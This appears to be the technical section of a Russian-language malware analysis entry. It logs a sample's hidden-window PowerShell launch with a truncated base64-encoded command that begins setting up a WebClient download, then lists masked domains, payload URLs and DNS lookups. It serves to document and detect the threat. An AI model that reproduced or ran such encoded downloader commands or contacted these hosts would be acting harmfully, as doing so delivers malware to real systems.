Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiADYAXwBfADcANwBfAD0AKAAnAFUAJwArACcANgAnACsAJwBfADQANgBfACcAKQA7ACQAVQA0ADAAXwA5ADgAXwA4AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AXwA4ADcAXwBfADEAPQAoAC...
- 'se####tiquespa.com':80
- 'se####tiquespa.com':443
- 'tk##ol.net':80
- 'tk##ol.net':443
- 'ic####.#ospedagemdesites.ws':80
- 'sp#######cessengineering.com.my':80
- http://se####tiquespa.com/l5oBTin
- http://tk##ol.net/13BDYWM
- http://ic####.#ospedagemdesites.ws/NFUvcViiv5
- http://ic####.#ospedagemdesites.ws/NFUvcViiv5/
- http://sp#######cessengineering.com.my/eof86bw/82NbuvX
- 'se####tiquespa.com':443
- 'tk##ol.net':443
- DNS ASK se####tiquespa.com
- DNS ASK tk##ol.net
- DNS ASK ic####.#ospedagemdesites.ws
- DNS ASK sp#######cessengineering.com.my
- DNS ASK si###oil.co.th
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiADYAXwBfADcANwBfAD0AKAAnAFUAJwArACcANgAnACsAJwBfADQANgBfACcAKQA7ACQAVQA0ADAAXwA5ADgAXwA4AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAG8AXwA4ADcAXwBfADEAPQAoAC...' (со скрытым окном)